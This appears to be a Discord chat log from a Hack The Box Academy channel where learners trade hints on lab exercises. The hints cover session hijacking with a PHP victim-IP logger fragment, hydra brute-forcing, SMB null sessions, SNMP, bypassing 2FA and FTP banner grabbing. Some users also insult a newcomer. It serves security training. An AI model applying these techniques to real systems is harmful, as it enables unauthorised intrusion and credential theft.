if you want to use some scripts and output to an xmlfile >> and convert to html
or go even lower
32
can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP address in the index.php file for those. Can someone please share an example.
"Victim IP: {$_SERVER['REMOTE_ADDR']}
Wait a sec @naive field I think I know which section that is and if I'm correct, try first just connecting to that 2121 port and see what the banner tells you - that may speed up your results
bc you don't need to log on to see a banner, just connect
Gotta sign out via the start menu then log back in through your RDP client.
Anyone having issues with UDP services? I don't get any response from them.
You can test using the Footprint module, SNMP or IPMI sections
It works on pwnbox
nvm @naive field wrong module i was thinking sorry but the username and password are in those lists
okay gotchya, thanks
its still ongoing
i hope its not like in the last module i did
where for some reason i could not get the pw and user for no reason
I was able to get it with -t 16 with hydra, checking with 32 now
im on 32
been 20min by now
32 worked for me
dm me what command you're using if you're using hydra idk about medusa
bet
Has anyone finished the final session puzzling exercise? I managed to change the admin password, but now it's asking for a 2fa code and I'm stumped
question on the SMB section, sorry @fathom pendant but still stuck on this. Did you have to revert a few times to get it to work? Got a tool listening but not seeing anything coming in even with null session
give me one sec to look
rgr, appreciate it!!
i believe all you have to do is make sure r* is running with the tun0 interface and on the remote machine call \\yourip\somesharename and it does something
it may also have something to do with rpc and creating shares
but I could absolutely be remembering this wrong and you just need to grab a couple things from the share and you're good
this one is fuzzy for me haven't come back and redone my notes in it
no; this isn't for that sort of thing this channel is for the Academy Modules found at http://academy.hackthebox.com
you can ask anyone else that's participating in it for help, but generally asking for outside help for active CTFs is disallowed
still not allowed
and still not the place for it
lol
if it's your hw then surely you should be able to complete it
Just point him in the right direction at least instead of just saying this isn't the place for it.
they just said
this is modules channel
for every request someone need to satisfy this channel is not gonna be what is intended for
Okay so where should he go then?
somewhere else
idk, he can ask in general or somewhere
if its ur homework u can prob find
the answer online for it
i saw these type of challenges a lot
u can find a similar one and reverse the encryption urself
research is the key
if u dont know how to do it :D
It's not for me, it's his but he asked for help and I sent him to this discord because usually people are helpful here. Thank you
Ask chatgpt, why are you asking in HTB modules section how to do your homework
or this .
yeah I saw a thing in the share, but the thing you cant snag with the null session
Lol
yeah, chatgpt can prob solve this easily
yeah regoing over it now to help
this is why notes are important I'll Dm you what I did it has nothing to do with responder, sorry for leading you down a bad path @fallow delta
No worries!! Yeah we have read access to the share, but cant download the thing with the null session
@odd notch community strings is a way for admins to access servers remotely. As stated it's fairly weak and doesn't enforce encryption due to it only being submitted in plaintext
the methods from that section will show you how to exploit a vulnerable snmp server if you follow the instructions
what is the best way to boot someone?
by tagging a mod for the person being off topic and violating server rules like you are
this channel is for module discussion only
only
only
only
oh
where can i discuss that?
nowhere get lost
idc
if it's a member causing issues dm a mod
server is for professionals trying to learn, not for 12 yo skids
i was just asking a question no need to get aggressive
there's a reason he's aggressive
the question was dumb and reflects poorly on you
we see this shit 24/7 in here
and i aint 12 btw
ok chill man chill
might actually start being nice if you can prove your reading comprehension is better than the avg loser that asks your kind of question
till then
what rules did i break tell me the number
bzzzt wrong
doesnt matter, this channel is for module discussion only
so unless youre here to discuss modules
what channel is for reg chats

im just asking
if you read everything youd know
so there is a chat where i can talk about that stuff
offtopic
wait
oh nvm
oh yeah dont worry about what i said
Hi all
anyone here that can help me with Attacking Common Services
attacking FTP
?
I know the FTP number but when I try to connect I get the message that the port is closed and in the nmap scan the port doesn't even appear
so just wanted to know if anyone had the same problem
you sure you have the right port
NMAP scan over all ports seems to me to be a suitable solution
can you show the command you use for the port scan between spoiler tags?
well I answer the first question with the number and it says it's correct
scanned all ports
nmap -sC -sV -p- SERVER_IP
same command in the cheat sheet
@fiery sparrow can the Blacksky: Cloud Labs be used from the academy? Is it mandatory to be in a company for access it?
contact support
yeah
Thanks
well I just spun up the lab and the service is listening on the correct port for me
all right thanks man
Attacking Common Services FTP is spinning on an alternate port (but it's still considered a standard one in terms of alternates, much like 8080 for http)
ye but he says he already got the port question correct
also with the ftp command the syntax is simple ftp ip port
Did you ever figure out how to bypass the MFA?
It's just frustrating when I don't know what to do because of the question and everything I try doesn't work. Isn't there a way to ask someone directly about the individual steps?
The question is "Apply what you learned in this section to grab the banner of the above server and submit it as the answer." But I don't know what this question means. If I then want to try everything I've learned before, then some things don't work. Then I try to log in via ssh, but there comes an error message. I'm in the module Basic Tools from Getting Started.
Can someone help me?
what part of the question is confusing?
i cant find Bash in the top left section of the instance, where is it?
What does "grab the banner of the above server" mean?
attrape la banniere sur le serveur du dessus
What language is this?
I am German.
french
do you know what a banner is?
wut your username is french
oh sorry
that's right
yes, for example. I don't know what I have to do.
theres just "applications places system"
its so satisfying getting the right answer after spending so long on it
Follow what the module and section was telling you to do
what does the section say about getting banners
nothing
reset the server and now I can connect to the port
maybe the server could not start the FTP service or something


